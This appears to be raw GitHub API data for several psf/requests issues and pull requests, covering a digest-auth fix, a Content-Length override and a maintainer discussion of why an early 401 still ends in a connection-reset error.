{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2333/reactions" }
https://api.github.com/repos/psf/requests/issues/2333/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2333.diff", "html_url": "https://github.com/psf/requests/pull/2333", "merged_at": "2014-11-12T15:53:32Z", "patch_url": "https://github.com/psf/requests/pull/2333.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2333" }
true
[ ":sparkles: :cake: :sparkles: Thanks @akitada !!!\n" ]
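The record above (PR #2333) fixes HTTPDigestAuth so that `pos` stays `None` when the body is not a file, because digest auth must rewind a file-like body before re-sending the request after a 401 challenge. A minimal sketch of that file/non-file distinction, using a hypothetical `body_position` helper (not the actual requests code, which lives in `PreparedRequest`):

```python
import io


def body_position(body):
    # If the body is file-like, remember its read position so it can be
    # rewound before the request is retried after a 401 challenge.
    # A plain str/bytes body has no position: return None so the caller
    # does not mistake it for a file (the bug PR #2333 fixes).
    try:
        return body.tell()
    except (AttributeError, OSError):
        return None


# File-like body: position is recorded and could be restored with seek().
buf = io.BytesIO(b"payload")
buf.read(3)
print(body_position(buf))      # -> 3

# Non-file body: no position, pos stays None.
print(body_position(b"data"))  # -> None
```

With `pos` left as `None` for plain bodies, the retry path can simply skip the rewind step instead of calling `seek()` on an object that has none.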
https://api.github.com/repos/psf/requests/issues/2332
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2332/labels{/name}
https://api.github.com/repos/psf/requests/issues/2332/comments
https://api.github.com/repos/psf/requests/issues/2332/events
https://github.com/psf/requests/pull/2332
48,518,978
MDExOlB1bGxSZXF1ZXN0MjQyOTc2MTg=
2,332
Add overriding Content-Length
{ "avatar_url": "https://avatars.githubusercontent.com/u/2456311?v=4", "events_url": "https://api.github.com/users/asnelzin/events{/privacy}", "followers_url": "https://api.github.com/users/asnelzin/followers", "following_url": "https://api.github.com/users/asnelzin/following{/other_user}", "gists_url": "https://api.github.com/users/asnelzin/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/asnelzin", "id": 2456311, "login": "asnelzin", "node_id": "MDQ6VXNlcjI0NTYzMTE=", "organizations_url": "https://api.github.com/users/asnelzin/orgs", "received_events_url": "https://api.github.com/users/asnelzin/received_events", "repos_url": "https://api.github.com/users/asnelzin/repos", "site_admin": false, "starred_url": "https://api.github.com/users/asnelzin/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/asnelzin/subscriptions", "type": "User", "url": "https://api.github.com/users/asnelzin", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-12T14:58:25Z
2021-09-08T09:01:17Z
2014-11-12T17:34:48Z
CONTRIBUTOR
resolved
This is related to https://github.com/kennethreitz/requests/issues/2329 Just implemented @Lukasa's solution and added test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2332/reactions" }
https://api.github.com/repos/psf/requests/issues/2332/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2332.diff", "html_url": "https://github.com/psf/requests/pull/2332", "merged_at": "2014-11-12T17:34:48Z", "patch_url": "https://github.com/psf/requests/pull/2332.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2332" }
true
[ "LGTM. I'm happy to take this. :cake: Thanks!\n" ]
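PR #2332 above (resolving issue #2329) lets a caller-supplied Content-Length header override the auto-computed one. A rough sketch of that idea with a hypothetical helper — the real logic is in `PreparedRequest.prepare_content_length` and handles more body types than shown here:

```python
def prepare_content_length(headers, body):
    # Sketch: honour a Content-Length the caller already supplied;
    # otherwise derive it from the body. (Hypothetical helper, not
    # the actual requests implementation.)
    if 'Content-Length' not in headers:
        headers['Content-Length'] = str(len(body))
    return headers


# No header given: computed from the body.
print(prepare_content_length({}, b'hello'))                        # -> {'Content-Length': '5'}

# Caller override wins, e.g. to send a deliberately truncated length.
print(prepare_content_length({'Content-Length': '3'}, b'hello'))   # -> {'Content-Length': '3'}
```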
https://api.github.com/repos/psf/requests/issues/2331
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2331/labels{/name}
https://api.github.com/repos/psf/requests/issues/2331/comments
https://api.github.com/repos/psf/requests/issues/2331/events
https://github.com/psf/requests/issues/2331
48,497,928
MDU6SXNzdWU0ODQ5NzkyOA==
2,331
401 does not prevent ConnectionError: [Errno 104] Connection reset by peer
{ "avatar_url": "https://avatars.githubusercontent.com/u/6807917?v=4", "events_url": "https://api.github.com/users/suonto/events{/privacy}", "followers_url": "https://api.github.com/users/suonto/followers", "following_url": "https://api.github.com/users/suonto/following{/other_user}", "gists_url": "https://api.github.com/users/suonto/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/suonto", "id": 6807917, "login": "suonto", "node_id": "MDQ6VXNlcjY4MDc5MTc=", "organizations_url": "https://api.github.com/users/suonto/orgs", "received_events_url": "https://api.github.com/users/suonto/received_events", "repos_url": "https://api.github.com/users/suonto/repos", "site_admin": false, "starred_url": "https://api.github.com/users/suonto/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/suonto/subscriptions", "type": "User", "url": "https://api.github.com/users/suonto", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-12T11:02:05Z
2021-09-08T23:07:02Z
2014-11-12T14:35:41Z
NONE
resolved
The following code behaviour is not logical in a specific case: response = requests.post(url, data=yielding_function()) If the server sends error in prepare, for example 401 before processing data, then in the client requests will raise: ConnectionError [Errno 104] Connection reset by peer In my opinion, the proper behaviour would be to not raise the exception, and return 401 and the body in the standard way. Of course only in the case that 401 is received before data is rejected. I further tested this by adding 1 second delay before yielding any data, and even if the 401 comes back from the server before any data is sent, requests will still ignore it, send the data, and then raise ConnectionError: [Errno 104] Connection reset by peer because the data get's rejected.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2331/reactions" }
https://api.github.com/repos/psf/requests/issues/2331/timeline
null
completed
null
null
false
[ "Thanks for raising this!\n\nUnfortunately, this bug lives a long way down the stack, in `httplib`. Specifically, `httplib` never checks the socket to see if there is any data to read before sending the body.\n\nWhat you've actually stumbled upon, however, is one of the trickiest parts of HTTP/1.1: how do we know we have a response to read? It's not enough to poll for data after we send the headers, because the response might be in flight and we could miss it. So we'd have to poll after each data send. That's not enough either: it's possible that we could send some data, causing the server to emit the response and RST packet that reaches us _after_ we poll (so not marking the socket readable) but _before_ we send again, therefore still causing the `Connection reset by peer` error. This gets more likely in the event of threading etc. causing us to have to wait.\n\nHandling all of this properly is extremely tricky and `httplib` just doesn't do it, so while we're using `httplib` we cannot get around it. One day I'd like to replace `httplib`, but until that happens we're between a rock and a hard place.\n\nAn interesting idea is whether we can take the socket with us when we throw these exceptions, so that the user can read from them if they want to. However, that breaks our connection re-use where we attempt to re-use socket objects: we can't do that if the user has a handle to them.\n\nI'm tempted to call this a \"can't fix\". @sigmavirus24?\n", "Not only \"can't\" but \"won't\" as well.\n" ]
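The closing comment on issue #2331 above explains why catching an early 401 while streaming a request body is inherently racy: the client would have to poll the socket for a pending response before every chunk, and even then the server's reply can land between the poll and the next send. A toy illustration of that per-chunk poll — not something `httplib` or requests actually does, and still subject to the race the comment describes:

```python
import select
import socket


def send_body(sock, chunks):
    # Before each chunk, poll with zero timeout for an early response.
    # Returns False if the server has already replied. Note the race
    # from the discussion above: a reply arriving between the poll and
    # sendall() still produces "Connection reset by peer".
    for chunk in chunks:
        readable, _, _ = select.select([sock], [], [], 0)
        if readable:
            return False  # early response waiting; stop sending the body
        sock.sendall(chunk)
    return True
```

With a `socketpair`, writing a fake early response from the peer before calling `send_body` makes the poll detect it and abort the upload; with a quiet peer the whole body goes out, and the race window between poll and send stays invisible.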